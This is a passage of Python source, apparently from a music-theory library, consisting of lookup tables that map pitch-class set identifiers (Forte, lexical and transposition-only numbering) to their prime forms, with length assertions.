(5, 27): (0, 1, 3, 5, 8),
(5, 28): (0, 2, 3, 6, 8),
(5, 29): (0, 1, 3, 6, 8),
(5, 30): (0, 1, 4, 6, 8),
(5, 31): (0, 1, 3, 6, 9),
(5, 32): (0, 1, 4, 6, 9),
(5, 33): (0, 2, 4, 6, 8),
(5, 34): (0, 2, 4, 6, 9),
(5, 35): (0, 2, 4, 7, 9),
(5, 36): (0, 1, 2, 4, 7),
(5, 37): (0, 3, 4, 5, 8),
(5, 38): (0, 1, 2, 5, 8),
# 6
(6, 1): (0, 1, 2, 3, 4, 5),
(6, 2): (0, 1, 2, 3, 4, 6),
(6, 3): (0, 1, 2, 3, 5, 6),
(6, 4): (0, 1, 2, 4, 5, 6),
(6, 5): (0, 1, 2, 3, 6, 7),
(6, 6): (0, 1, 2, 5, 6, 7),
(6, 7): (0, 1, 2, 6, 7, 8),
(6, 8): (0, 2, 3, 4, 5, 7),
(6, 9): (0, 1, 2, 3, 5, 7),
(6, 10): (0, 1, 3, 4, 5, 7),
(6, 11): (0, 1, 2, 4, 5, 7),
(6, 12): (0, 1, 2, 4, 6, 7),
(6, 13): (0, 1, 3, 4, 6, 7),
(6, 14): (0, 1, 3, 4, 5, 8),
(6, 15): (0, 1, 2, 4, 5, 8),
(6, 16): (0, 1, 4, 5, 6, 8),
(6, 17): (0, 1, 2, 4, 7, 8),
(6, 18): (0, 1, 2, 5, 7, 8),
(6, 19): (0, 1, 3, 4, 7, 8),
(6, 20): (0, 1, 4, 5, 8, 9),
(6, 21): (0, 2, 3, 4, 6, 8),
(6, 22): (0, 1, 2, 4, 6, 8),
(6, 23): (0, 2, 3, 5, 6, 8),
(6, 24): (0, 1, 3, 4, 6, 8),
(6, 25): (0, 1, 3, 5, 6, 8),
(6, 26): (0, 1, 3, 5, 7, 8),
(6, 27): (0, 1, 3, 4, 6, 9),
(6, 28): (0, 1, 3, 5, 6, 9),
(6, 29): (0, 1, 3, 6, 8, 9),
(6, 30): (0, 1, 3, 6, 7, 9),
(6, 31): (0, 1, 3, 5, 8, 9),
(6, 32): (0, 2, 4, 5, 7, 9),
(6, 33): (0, 2, 3, 5, 7, 9),
(6, 34): (0, 1, 3, 5, 7, 9),
(6, 35): (0, 2, 4, 6, 8, 10),
(6, 36): (0, 1, 2, 3, 4, 7),
(6, 37): (0, 1, 2, 3, 4, 8),
(6, 38): (0, 1, 2, 3, 7, 8),
(6, 39): (0, 2, 3, 4, 5, 8),
(6, 40): (0, 1, 2, 3, 5, 8),
(6, 41): (0, 1, 2, 3, 6, 8),
(6, 42): (0, 1, 2, 3, 6, 9),
(6, 43): (0, 1, 2, 5, 6, 8),
(6, 44): (0, 1, 2, 5, 6, 9),
(6, 45): (0, 2, 3, 4, 6, 9),
(6, 46): (0, 1, 2, 4, 6, 9),
(6, 47): (0, 1, 2, 4, 7, 9),
(6, 48): (0, 1, 2, 5, 7, 9),
(6, 49): (0, 1, 3, 4, 7, 9),
(6, 50): (0, 1, 4, 6, 7, 9),
}
assert len(_forte_identifier_to_prime_form) == 137
_lex_identifier_to_prime_form = {
# 0
(0, 1): (),
# 1
(1, 1): (0,),
# 2
(2, 1): (0, 1),
(2, 2): (0, 2),
(2, 3): (0, 3),
(2, 4): (0, 4),
(2, 5): (0, 5),
(2, 6): (0, 6),
# 3
(3, 1): (0, 1, 2),
(3, 2): (0, 1, 3),
(3, 3): (0, 1, 4),
(3, 4): (0, 1, 5),
(3, 5): (0, 1, 6),
(3, 6): (0, 2, 4),
(3, 7): (0, 2, 5),
(3, 8): (0, 2, 6),
(3, 9): (0, 2, 7),
(3, 10): (0, 3, 6),
(3, 11): (0, 3, 7),
(3, 12): (0, 4, 8),
# 4
(4, 1): (0, 1, 2, 3),
(4, 2): (0, 1, 2, 4),
(4, 3): (0, 1, 2, 5),
(4, 4): (0, 1, 2, 6),
(4, 5): (0, 1, 2, 7),
(4, 6): (0, 1, 3, 4),
(4, 7): (0, 1, 3, 5),
(4, 8): (0, 1, 3, 6),
(4, 9): (0, 1, 3, 7),
(4, 10): (0, 1, 4, 5),
(4, 11): (0, 1, 4, 6),
(4, 12): (0, 1, 4, 7),
(4, 13): (0, 1, 4, 8),
(4, 14): (0, 1, 5, 6),
(4, 15): (0, 1, 5, 7),
(4, 16): (0, 1, 5, 8),
(4, 17): (0, 1, 6, 7),
(4, 18): (0, 2, 3, 5),
(4, 19): (0, 2, 3, 6),
(4, 20): (0, 2, 3, 7),
(4, 21): (0, 2, 4, 6),
(4, 22): (0, 2, 4, 7),
(4, 23): (0, 2, 4, 8),
(4, 24): (0, 2, 5, 7),
(4, 25): (0, 2, 5, 8),
(4, 26): (0, 2, 6, 8),
(4, 27): (0, 3, 4, 7),
(4, 28): (0, 3, 5, 8),
(4, 29): (0, 3, 6, 9),
# 5
(5, 1): (0, 1, 2, 3, 4),
(5, 2): (0, 1, 2, 3, 5),
(5, 3): (0, 1, 2, 3, 6),
(5, 4): (0, 1, 2, 3, 7),
(5, 5): (0, 1, 2, 4, 5),
(5, 6): (0, 1, 2, 4, 6),
(5, 7): (0, 1, 2, 4, 7),
(5, 8): (0, 1, 2, 4, 8),
(5, 9): (0, 1, 2, 5, 6),
(5, 10): (0, 1, 2, 5, 7),
(5, 11): (0, 1, 2, 5, 8),
(5, 12): (0, 1, 2, 6, 7),
(5, 13): (0, 1, 2, 6, 8),
(5, 14): (0, 1, 3, 4, 6),
(5, 15): (0, 1, 3, 4, 7),
(5, 16): (0, 1, 3, 4, 8),
(5, 17): (0, 1, 3, 5, 6),
(5, 18): (0, 1, 3, 5, 7),
(5, 19): (0, 1, 3, 5, 8),
(5, 20): (0, 1, 3, 6, 7),
(5, 21): (0, 1, 3, 6, 8),
(5, 22): (0, 1, 3, 6, 9),
(5, 23): (0, 1, 3, 7, 8),
(5, 24): (0, 1, 4, 5, 7),
(5, 25): (0, 1, 4, 5, 8),
(5, 26): (0, 1, 4, 6, 8),
(5, 27): (0, 1, 4, 7, 8),
(5, 28): (0, 1, 4, 7, 9),
(5, 29): (0, 2, 3, 4, 6),
(5, 30): (0, 2, 3, 4, 7),
(5, 31): (0, 2, 3, 5, 7),
(5, 32): (0, 2, 3, 5, 8),
(5, 33): (0, 2, 3, 6, 8),
(5, 34): (0, 2, 4, 5, 8),
(5, 35): (0, 2, 4, 6, 8),
(5, 36): (0, 2, 4, 6, 9),
(5, 37): (0, 2, 4, 7, 9),
(5, 38): (0, 3, 4, 5, 8),
# 6
(6, 1): (0, 1, 2, 3, 4, 5),
(6, 2): (0, 1, 2, 3, 4, 6),
(6, 3): (0, 1, 2, 3, 4, 7),
(6, 4): (0, 1, 2, 3, 4, 8),
(6, 5): (0, 1, 2, 3, 5, 6),
(6, 6): (0, 1, 2, 3, 5, 7),
(6, 7): (0, 1, 2, 3, 5, 8),
(6, 8): (0, 1, 2, 3, 6, 7),
(6, 9): (0, 1, 2, 3, 6, 8),
(6, 10): (0, 1, 2, 3, 6, 9),
(6, 11): (0, 1, 2, 3, 7, 8),
(6, 12): (0, 1, 2, 4, 5, 6),
(6, 13): (0, 1, 2, 4, 5, 7),
(6, 14): (0, 1, 2, 4, 5, 8),
(6, 15): (0, 1, 2, 4, 6, 7),
(6, 16): (0, 1, 2, 4, 6, 8),
(6, 17): (0, 1, 2, 4, 6, 9),
(6, 18): (0, 1, 2, 4, 7, 8),
(6, 19): (0, 1, 2, 4, 7, 9),
(6, 20): (0, 1, 2, 5, 6, 7),
(6, 21): (0, 1, 2, 5, 6, 8),
(6, 22): (0, 1, 2, 5, 7, 8),
(6, 23): (0, 1, 2, 5, 7, 9),
(6, 24): (0, 1, 2, 5, 8, 9),
(6, 25): (0, 1, 2, 6, 7, 8),
(6, 26): (0, 1, 3, 4, 5, 7),
(6, 27): (0, 1, 3, 4, 5, 8),
(6, 28): (0, 1, 3, 4, 6, 7),
(6, 29): (0, 1, 3, 4, 6, 8),
(6, 30): (0, 1, 3, 4, 6, 9),
(6, 31): (0, 1, 3, 4, 7, 8),
(6, 32): (0, 1, 3, 4, 7, 9),
(6, 33): (0, 1, 3, 5, 6, 8),
(6, 34): (0, 1, 3, 5, 6, 9),
(6, 35): (0, 1, 3, 5, 7, 8),
(6, 36): (0, 1, 3, 5, 7, 9),
(6, 37): (0, 1, 3, 5, 8, 9),
(6, 38): (0, 1, 3, 6, 7, 9),
(6, 39): (0, 1, 3, 6, 8, 9),
(6, 40): (0, 1, 4, 5, 6, 8),
(6, 41): (0, 1, 4, 5, 8, 9),
(6, 42): (0, 1, 4, 6, 7, 9),
(6, 43): (0, 2, 3, 4, 5, 7),
(6, 44): (0, 2, 3, 4, 5, 8),
(6, 45): (0, 2, 3, 4, 6, 8),
(6, 46): (0, 2, 3, 4, 6, 9),
(6, 47): (0, 2, 3, 5, 6, 8),
(6, 48): (0, 2, 3, 5, 7, 9),
(6, 49): (0, 2, 4, 5, 7, 9),
(6, 50): (0, 2, 4, 6, 8, 10),
# 7
(7, 1): (0, 1, 2, 3, 4, 5, 6),
(7, 2): (0, 1, 2, 3, 4, 5, 7),
(7, 3): (0, 1, 2, 3, 4, 5, 8),
(7, 4): (0, 1, 2, 3, 4, 6, 7),
(7, 5): (0, 1, 2, 3, 4, 6, 8),
(7, 6): (0, 1, 2, 3, 4, 6, 9),
(7, 7): (0, 1, 2, 3, 4, 7, 8),
(7, 8): (0, 1, 2, 3, 4, 7, 9),
(7, 9): (0, 1, 2, 3, 5, 6, 7),
(7, 10): (0, 1, 2, 3, 5, 6, 8),
(7, 11): (0, 1, 2, 3, 5, 6, 9),
(7, 12): (0, 1, 2, 3, 5, 7, 8),
(7, 13): (0, 1, 2, 3, 5, 7, 9),
(7, 14): (0, 1, 2, 3, 5, 8, 9),
(7, 15): (0, 1, 2, 3, 6, 7, 8),
(7, 16): (0, 1, 2, 3, 6, 8, 9),
(7, 17): (0, 1, 2, 4, 5, 6, 8),
(7, 18): (0, 1, 2, 4, 5, 6, 9),
(7, 19): (0, 1, 2, 4, 5, 7, 8),
(7, 20): (0, 1, 2, 4, 5, 7, 9),
(7, 21): (0, 1, 2, 4, 5, 8, 9),
(7, 22): (0, 1, 2, 4, 6, 7, 8),
(7, 23): (0, 1, 2, 4, 6, 7, 9),
(7, 24): (0, 1, 2, 4, 6, 8, 10),
(7, 25): (0, 1, 2, 4, 6, 8, 9),
(7, 26): (0, 1, 2, 4, 7, 8, 9),
(7, 27): (0, 1, 2, 5, 6, 8, 9),
(7, 28): (0, 1, 3, 4, 5, 6, 8),
(7, 29): (0, 1, 3, 4, 5, 7, 8),
(7, 30): (0, 1, 3, 4, 5, 7, 9),
(7, 31): (0, 1, 3, 4, 6, 7, 9),
(7, 32): (0, 1, 3, 4, 6, 8, 10),
(7, 33): (0, 1, 3, 4, 6, 8, 9),
(7, 34): (0, 1, 3, 5, 6, 7, 9),
(7, 35): (0, 1, 3, 5, 6, 8, 10),
(7, 36): (0, 2, 3, 4, 5, 6, 8),
(7, 37): (0, 2, 3, 4, 5, 7, 9),
(7, 38): (0, 2, 3, 4, 6, 7, 9),
# 8
(8, 1): (0, 1, 2, 3, 4, 5, 6, 7),
(8, 2): (0, 1, 2, 3, 4, 5, 6, 8),
(8, 3): (0, 1, 2, 3, 4, 5, 6, 9),
(8, 4): (0, 1, 2, 3, 4, 5, 7, 8),
(8, 5): (0, 1, 2, 3, 4, 5, 7, 9),
(8, 6): (0, 1, 2, 3, 4, 5, 8, 9),
(8, 7): (0, 1, 2, 3, 4, 6, 7, 8),
(8, 8): (0, 1, 2, 3, 4, 6, 7, 9),
(8, 9): (0, 1, 2, 3, 4, 6, 8, 10),
(8, 10): (0, 1, 2, 3, 4, 6, 8, 9),
(8, 11): (0, 1, 2, 3, 4, 7, 8, 9),
(8, 12): (0, 1, 2, 3, 5, 6, 7, 8),
(8, 13): (0, 1, 2, 3, 5, 6, 7, 9),
(8, 14): (0, 1, 2, 3, 5, 6, 8, 9),
(8, 15): (0, 1, 2, 3, 5, 7, 8, 10),
(8, 16): (0, 1, 2, 3, 5, 7, 8, 9),
(8, 17): (0, 1, 2, 3, 5, 7, 9, 10),
(8, 18): (0, 1, 2, 3, 6, 7, 8, 9),
(8, 19): (0, 1, 2, 4, 5, 6, 7, 9),
(8, 20): (0, 1, 2, 4, 5, 6, 8, 10),
(8, 21): (0, 1, 2, 4, 5, 6, 8, 9),
(8, 22): (0, 1, 2, 4, 5, 7, 8, 10),
(8, 23): (0, 1, 2, 4, 5, 7, 8, 9),
(8, 24): (0, 1, 2, 4, 5, 7, 9, 10),
(8, 25): (0, 1, 2, 4, 6, 7, 8, 10),
(8, 26): (0, 1, 3, 4, 5, 6, 7, 9),
(8, 27): (0, 1, 3, 4, 5, 6, 8, 9),
(8, 28): (0, 1, 3, 4, 6, 7, 9, 10),
(8, 29): (0, 2, 3, 4, 5, 6, 7, 9),
# 9
(9, 1): (0, 1, 2, 3, 4, 5, 6, 7, 8),
(9, 2): (0, 1, 2, 3, 4, 5, 6, 7, 9),
(9, 3): (0, 1, 2, 3, 4, 5, 6, 8, 10),
(9, 4): (0, 1, 2, 3, 4, 5, 6, 8, 9),
(9, 5): (0, 1, 2, 3, 4, 5, 7, 8, 9),
(9, 6): (0, 1, 2, 3, 4, 5, 7, 9, 10),
(9, 7): (0, 1, 2, 3, 4, 6, 7, 8, 9),
(9, 8): (0, 1, 2, 3, 4, 6, 7, 9, 10),
(9, 9): (0, 1, 2, 3, 4, 6, 8, 9, 10),
(9, 10): (0, 1, 2, 3, 5, 6, 7, 8, 10),
(9, 11): (0, 1, 2, 3, 5, 6, 8, 9, 10),
(9, 12): (0, 1, 2, 4, 5, 6, 8, 9, 10),
# 10
(10, 1): (0, 1, 2, 3, 4, 5, 6, 7, 8, 10),
(10, 2): (0, 1, 2, 3, 4, 5, 6, 7, 8, 9),
(10, 3): (0, 1, 2, 3, 4, 5, 6, 7, 9, 10),
(10, 4): (0, 1, 2, 3, 4, 5, 6, 8, 9, 10),
(10, 5): (0, 1, 2, 3, 4, 5, 7, 8, 9, 10),
(10, 6): (0, 1, 2, 3, 4, 6, 7, 8, 9, 10),
# 11
(11, 1): (0, 1, 2, 3, 4, 5, 6, 7, 8, 9, 10),
# 12
(12, 1): (0, 1, 2, 3, 4, 5, 6, 7, 8, 9, 10, 11),
}
assert len(_lex_identifier_to_prime_form) == 224
_transposition_only_identifier_to_prime_form = {
# 0
(0, 1): (),
# 1
(1, 1): (0),
# 2
(2, 1): (0, 1),
(2, 2): (0, 2),
(2, 3): (0, 3),
(2, 4): (0, 4),
(2, 5): (0, 5),
(2, 6): (0, 6),
# 3
(3, 1): (0, 1, 2),
(3, 2): (0, 1, 3),
(3, 3): (0, 1, 4),
(3, 4): (0, 1, 5),
(3, 5): (0, 1, 6),
(3, 6): (0, 2, 3),
(3, 7): (0, 2, 4),
(3, 8): (0, 2, 5),
(3, 9): (0, 2, 6),
(3, 10): (0, 2, 7),
(3, 11): (0, 3, 4),
(3, 12): (0, 3, 5),
(3, 13): (0, 3, 6),
(3, 14): (0, 3, 7),
(3, 15): (0, 4, 5),
(3, 16): (0, 4, 6),
(3, 17): (0, 4, 7),
(3, 18): (0, 4, 8),
(3, 19): (0, 5, 6),
# 4
(4, 1): (0, 1, 2, 3),
(4, 2): (0, 1, 2, 4),
(4, 3): (0, 1, 2, 5),
(4, 4): (0, 1, 2, 6),
(4, 5): (0, 1, 2, 7),
(4, 6): (0, 1, 3, 4),
(4, 7): (0, 1, 3, 5),
(4, 8): (0, 1, 3, 6),
(4, 9): (0, 1, 3, 7),
(4, 10): (0, 1, 4, 5),
(4, 11): (0, 1, 4, 6),
(4, 12): (0, 1, 4, 7),
(4, 13): (0, 1, 4, 8),
(4, 14): (0, 1, 5, 6),
(4, 15): (0, 1, 5, 7),
(4, 16): (0, 1, 5, 8),
(4, 17): (0, 1, 6, 7),
(4, 18): (0, 2, 3, 4),
(4, 19): (0, 2, 3, 5),
(4, 20): (0, 2, 3, 6),
(4, 21): (0, 2, 3, 7),
(4, 22): (0, 2, 4, 5),
(4, 23): (0, 2, 4, 6),
(4, 24): (0, 2, 4, 7),
(4, 25): (0, 2, 4, 8),
(4, 26): (0, 2, 5, 6),
(4, 27): (0, 2, 5, 7),
(4, 28): (0, 2, 5, 8),
(4, 29): (0, 2, 6, 7),
(4, 30): (0, 2, 6, 8),
(4, 31): (0, 3, 4, 5),
(4, 32): (0, 3, 4, 6),
(4, 33): (0, 3, 4, 7),
(4, 34): (0, 3, 4, 8),
(4, 35): (0, 3, 5, 6),
(4, 36): (0, 3, 5, 7),
(4, 37): (0, 3, 5, 8),
(4, 38): (0, 3, 6, 7),
(4, 39): (0, 3, 6, 8),
(4, 40): (0, 3, 6, 9),
(4, 41): (0, 4, 5, 6),
(4, 42): (0, 4, 5, 7),
(4, 43): (0, 4, 6, 7),
# 5
(5, 1): (0, 1, 2, 3, 4),
(5, 2): (0, 1, 2, 3, 5),
(5, 3): (0, 1, 2, 3, 6),
(5, 4): (0, 1, 2, 3, 7),
(5, 5): (0, 1, 2, 4, 5),
(5, 6): (0, 1, 2, 4, 6),
(5, 7): (0, 1, 2, 4, 7),
(5, 8): (0, 1, 2, 4, 8),
(5, 9): (0, 1, 2, 5, 6),
(5, 10): (0, 1, 2, 5, 7),
(5, 11): (0, 1, 2, 5, 8),
(5, 12): (0, 1, 2, 6, 7),
(5, 13): (0, 1, 2, 6, 8),
(5, 14): (0, 1, 3, 4, 5),
(5, 15): (0, 1, 3, 4, 6),
(5, 16): (0, 1, 3, 4, 7),
(5, 17): (0, 1, 3, 4, 8),
(5, 18): (0, 1, 3, 5, 6),
(5, 19): (0, 1, 3, 5, 7),
(5, 20): (0, 1, 3, 5, 8),
(5, 21): (0, 1, 3, 6, 7),
(5, 22): (0, 1, 3, 6, 8),
(5, 23): (0, 1, 3, 6, 9),
(5, 24): (0, 1, 3, 7, 8),
(5, 25): (0, 1, 4, 5, 6),
(5, 26): (0, 1, 4, 5, 7),
(5, 27): (0, 1, 4, 5, 8),
(5, 28): (0, 1, 4, 6, 7),
(5, 29): (0, 1, 4, 6, 8),
(5, 30): (0, 1, 4, 6, 9),
(5, 31): (0, 1, 4, 7, 8),
(5, 32): (0, 1, 4, 7, 9),
(5, 33): (0, 1, 5, 6, 7),
(5, 34): (0, 1, 5, 7, 8),
(5, 35): (0, 2, 3, 4, 5),
(5, 36): (0, 2, 3, 4, 6),
(5, 37): (0, 2, 3, 4, 7),
(5, 38): (0, 2, 3, 4, 8),
(5, 39): (0, 2, 3, 5, 6),
(5, 40): (0, 2, 3, 5, 7),
(5, 41): (0, 2, 3, 5, 8),
(5, 42): (0, 2, 3, 6, 7),
(5, 43): (0, 2, 3, 6, 8),
(5, 44): (0, 2, 3, 6, 9),
(5, 45): (0, 2, 4, 5, 6),
(5, 46): (0, 2, 4, 5, 7),
(5, 47): (0, 2, 4, 5, 8),
(5, 48): (0, 2, 4, 6, 7),
(5, 49): (0, 2, 4, 6, 8),
(5, 50): (0, 2, 4, 6, 9),
(5, 51): (0, 2, 4, 7, 8),
(5, 52): (0, 2, 4, 7, 9),
(5, 53): (0, 2, 5, 6, 7),
(5, 54): (0, 2, 5, 6, 8),
(5, 55): (0, 2, 5, 7, 8),
(5, 56): (0, 3, 4, 5, 6),
(5, 57): (0, 3, 4, 5, 7),
(5, 58): (0, 3, 4, 5, 8),
(5, 59): (0, 3, 4, 6, 7),
(5, 60): (0, 3, 4, 6, 8),
(5, 61): (0, 3, 4, 7, 8),
(5, 62): (0, 3, 5, 6, 7),
(5, 63): (0, 3, 5, 6, 8),
(5, 64): (0, 3, 5, 7, 8),
(5, 65): (0, 3, 6, 7, 8),
(5, 66): (0, 4, 5, 6, 7),
# 6
(6, 1): (0, 1, 2, 3, 4, 5),
(6, 2): (0, 1, 2, 3, 4, 6),
(6, 3): (0, 1, 2, 3, 4, 7),
(6, 4): (0, 1, 2, 3, 4, 8),
(6, 5): (0, 1, 2, 3, 5, 6),
(6, 6): (0, 1, 2, 3, 5, 7),
(6, 7): (0, 1, 2, 3, 5, 8),
(6, 8): (0, 1, 2, 3, 6, 7),
(6, 9): (0, 1, 2, 3, 6, 8),
(6, 10): (0, 1, 2, 3, 6, 9),
(6, 11): (0, 1, 2, 3, 7, 8),
(6, 12): (0, 1, 2, 4, 5, 6),
(6, 13): (0, 1, 2, 4, 5, 7),
(6, 14): (0, 1, 2, 4, 5, 8),
(6, 15): (0, 1, 2, 4, 6, 7),
(6, 16): (0, 1, 2, 4, 6, 8),
(6, 17): (0, 1, 2, 4, 6, 9),
(6, 18): (0, 1, 2, 4, 7, 8),
(6, 19): (0, 1, 2, 4, 7, 9),
(6, 20): (0, 1, 2, 5, 6, 7),
(6, 21): (0, 1, 2, 5, 6, 8),
(6, 22): (0, 1, 2, 5, 6, 9),
(6, 23): (0, 1, 2, 5, 7, 8),
(6, 24): (0, 1, 2, 5, 7, 9),
(6, 25): (0, 1, 2, 5, 8, 9),
(6, 26): (0, 1, 2, 6, 7, 8),
(6, 27): (0, 1, 3, 4, 5, 6),
(6, 28): (0, 1, 3, 4, 5, 7),
(6, 29): (0, 1, 3, 4, 5, 8),
(6, 30): (0, 1, 3, 4, 6, 7),
(6, 31): (0, 1, 3, 4, 6, 8),
(6, 32): (0, 1, 3, 4, 6, 9),
(6, 33): (0, 1, 3, 4, 7, 8),
(6, 34): (0, 1, 3, 4, 7, 9),
(6, 35): (0, 1, 3, 5, 6, 7),
(6, 36): (0, 1, 3, 5, 6, 8),
(6, 37): (0, 1, 3, 5, 6, 9),
(6, 38): (0, 1, 3, 5, 7, 8),
(6, 39): (0, 1, 3, 5, 7, 9),
(6, 40): (0, 1, 3, 5, 8, 9),
(6, 41): (0, 1, 3, 6, 7, 8),
(6, 42): (0, 1, 3, 6, 7, 9),
(6, 43): (0, 1, 3, 6, 8, 9),
(6, 44): (0, 1, 4, 5, 6, 7),
(6, 45): (0, 1, 4, 5, 6, 8),
(6, 46): (0, 1, 4, 5, 7, 8),
(6, 47): (0, 1, 4, 5, 8, 9),
(6, 48): (0, 1, 4, 6, 7, 8),
(6, 49): (0, 1, 4, 6, 7, 9),
(6, 50): (0, 1, 4, 6, 8, 9),
(6, 51): (0, 2, 3, 4, 5, 6),
(6, 52): (0, 2, 3, 4, 5, 7),
(6, 53): (0, 2, 3, 4, 5, 8),
(6, 54): (0, 2, 3, 4, 6, 7),
(6, 55): (0, 2, 3, 4, 6, 8),
(6, 56): (0, 2, 3, 4, 6, 9),
(6, 57): (0, 2, 3, 4, 7, 8),
(6, 58): (0, 2, 3, 4, 7, 9),
(6, 59): (0, 2, 3, 5, 6, 7),
(6, 60): (0, 2, 3, 5, 6, 8),
(6, 61): (0, 2, 3, 5, 6, 9),
(6, 62): (0, 2, 3, 5, 7, 8),
(6, 63): (0, 2, 3, 5, 7, 9),
(6, 64): (0, 2, 3, 6, 7, 8),
(6, 65): (0, 2, 3, 6, 8, 9),
(6, 66): (0, 2, 4, 5, 6, 7),
(6, 67): (0, 2, 4, 5, 6, 8),
(6, 68): (0, 2, 4, 5, 6, 9),
(6, 69): (0, 2, 4, 5, 7, 8),
(6, 70): (0, 2, 4, 5, 7, 9),
(6, 71): (0, 2, 4, 6, 7, 8),
(6, 72): (0, 2, 4, 6, 7, 9),
(6, 73): (0, 2, 4, 6, 8, 10),
(6, 74): (0, 2, 4, 6, 8, 9),
(6, 75): (0, 2, 5, 6, 7, 8),
(6, 76): (0, 3, 4, 5, 6, 7),
(6, 77): (0, 3, 4, 5, 6, 8),
(6, 78): (0, 3, 4, 5, 7, 8),
(6, 79): (0, 3, 4, 6, 7, 8),
(6, 80): (0, 3, 5, 6, 7, 8),
# 7
(7, 1): (0, 1, 2, 3, 4, 5, 6),
(7, 2): (0, 1, 2, 3, 4, 5, 7),
(7, 3): (0, 1, 2, 3, 4, 5, 8),
(7, 4): (0, 1, 2, 3, 4, 6, 7),
(7, 5): (0, 1, 2, 3, 4, 6, 8),
(7, 6): (0, 1, 2, 3, 4, 6, 9),
(7, 7): (0, 1, 2, 3, 4, 7, 8),
(7, 8): (0, 1, 2, 3, 4, 7, 9),
(7, 9): (0, 1, 2, 3, 5, 6, 7),
(7, 10): (0, 1, 2, 3, 5, 6, 8),
(7, 11): (0, 1, 2, 3, 5, 6, 9),
(7, 12): (0, 1, 2, 3, 5, 7, 8),
(7, 13): (0, 1, 2, 3, 5, 7, 9),
(7, 14): (0, 1, 2, 3, 5, 8, 9),
(7, 15): (0, 1, 2, 3, 6, 7, 8),
(7, 16): (0, 1, 2, 3, 6, 7, 9),
(7, 17): (0, 1, 2, 3, 6, 8, 9),
(7, 18): (0, 1, 2, 4, 5, 6, 7),
(7, 19): (0, 1, 2, 4, 5, 6, 8),
(7, 20): (0, 1, 2, 4, 5, 6, 9),
(7, 21): (0, 1, 2, 4, 5, 7, 8),
(7, 22): (0, 1, 2, 4, 5, 7, 9),
(7, 23): (0, 1, 2, 4, 5, 8, 9),
(7, 24): (0, 1, 2, 4, 6, 7, 8),
(7, 25): (0, 1, 2, 4, 6, 7, 9),
(7, 26): (0, 1, 2, 4, 6, 8, 10),
(7, 27): (0, 1, 2, 4, 6, 8, 9),
(7, 28): (0, 1, 2, 4, 7, 8, 9),
(7, 29): (0, 1, 2, 5, 6, 7, 8),
(7, 30): (0, 1, 2, 5, 6, 8, 9),
(7, 31): (0, 1, 2, 5, 7, 8, 9),
(7, 32): (0, 1, 3, 4, 5, 6, 7),
(7, 33): (0, 1, 3, 4, 5, 6, 8),
(7, 34): (0, 1, 3, 4, 5, 6, 9),
(7, 35): (0, 1, 3, 4, 5, 7, 8),
(7, 36): (0, 1, 3, 4, 5, 7, 9),
(7, 37): (0, 1, 3, 4, 5, 8, 9),
(7, 38): (0, 1, 3, 4, 6, 7, 8),
(7, 39): (0, 1, 3, 4, 6, 7, 9),
(7, 40): (0, 1, 3, 4, 6, 8, 10),
(7, 41): (0, 1, 3, 4, 6, 8, 9),
(7, 42): (0, 1, 3, 5, 6, 7, 8),
(7, 43): (0, 1, 3, 5, 6, 7, 9),
(7, 44): (0, 1, 3, 5, 6, 8, 10),
(7, 45): (0, 1, 3, 5, 6, 8, 9),
(7, 46): (0, 1, 3, 5, 7, 8, 9),
(7, 47): (0, 1, 4, 5, 6, 7, 8),
(7, 48): (0, 1, 4, 6, 7, 8, 9),
(7, 49): (0, 2, 3, 4, 5, 6, 7),
(7, 50): (0, 2, 3, 4, 5, 6, 8),
(7, 51): (0, 2, 3, 4, 5, 6, 9),
(7, 52): (0, 2, 3, 4, 5, 7, 8),
(7, 53): (0, 2, 3, 4, 5, 7, 9),
(7, 54): (0, 2, 3, 4, 6, 7, 8),
(7, 55): (0, 2, 3, 4, 6, 7, 9),
(7, 56): (0, 2, 3, 4, 6, 8, 9),
(7, 57): (0, 2, 3, 5, 6, 7, 8),
(7, 58): (0, 2, 3, 5, 6, 7, 9),
(7, 59): (0, 2, 3, 5, 6, 8, 9),
(7, 60): (0, 2, 3, 5, 7, 8, 9),
(7, 61): (0, 2, 4, 5, 6, 7, 8),
(7, 62): (0, 2, 4, 5, 6, 7, 9),
(7, 63): (0, 2, 4, 5, 6, 8, 9),
(7, 64): (0, 2, 4, 5, 7, 8, 9),
(7, 65): (0, 2, 4, 6, 7, 8, 9),
(7, 66): (0, 3, 4, 5, 6, 7, 8),
# 8
(8, 1): (0, 1, 2, 3, 4, 5, 6, 7),
(8, 2): (0, 1, 2, 3, 4, 5, 6, 8),
(8, 3): (0, 1, 2, 3, 4, 5, 6, 9),
(8, 4): (0, 1, 2, 3, 4, 5, 7, 8),
(8, 5): (0, 1, 2, 3, 4, 5, 7, 9),
(8, 6): (0, 1, 2, 3, 4, 5, 8, 9),
(8, 7): (0, 1, 2, 3, 4, 6, 7, 8),
(8, 8): (0, 1, 2, 3, 4, 6, 7, 9),
(8, 9): (0, 1, 2, 3, 4, 6, 8, 10),
(8, 10): (0, 1, 2, 3, 4, 6, 8, 9),
(8, 11): (0, 1, 2, 3, 4, 7, 8, 9),
(8, 12): (0, 1, 2, 3, 5, 6, 7, 8),
(8, 13): (0, 1, 2, 3, 5, 6, 7, 9),
(8, 14): (0, 1, 2, 3, 5, 6, 8, 10),
(8, 15): (0, 1, 2, 3, 5, 6, 8, 9),
(8, 16): (0, 1, 2, 3, 5, 7, 8, 10),
(8, 17): (0, 1, 2, 3, 5, 7, 8, 9),
(8, 18): (0, 1, 2, 3, 5, 7, 9, 10),
(8, 19): (0, 1, 2, 3, 6, 7, 8, 9),
(8, 20): (0, 1, 2, 4, 5, 6, 7, 8),
(8, 21): (0, 1, 2, 4, 5, 6, 7, 9),
(8, 22): (0, 1, 2, 4, 5, 6, 8, 10),
(8, 23): (0, 1, 2, 4, 5, 6, 8, 9),
(8, 24): (0, 1, 2, 4, 5, 7, 8, 10),
(8, 25): (0, 1, 2, 4, 5, 7, 8, 9),
(8, 26): (0, 1, 2, 4, 5, 7, 9, 10),
(8, 27): (0, 1, 2, 4, 6, 7, 8, 10),
(8, 28): (0, 1, 2, 4, 6, 7, 8, 9),
(8, 29): (0, 1, 2, 4, 6, 7, 9, 10),
(8, 30): (0, 1, 3, 4, 5, 6, 7, 8),
(8, 31): (0, 1, 3, 4, 5, 6, 7, 9),
(8, 32): (0, 1, 3, 4, 5, 6, 8, 9),
(8, 33): (0, 1, 3, 4, 5, 7, 8, 9),
(8, 34): (0, 1, 3, 4, 6, 7, 8, 9),
(8, 35): (0, 1, 3, 4, 6, 7, 9, 10),
(8, 36): (0, 1, 3, 5, 6, 7, 8, 9),
(8, 37): (0, 2, 3, 4, 5, 6, 7, 8),
(8, 38): (0, 2, 3, 4, 5, 6, 7, 9),
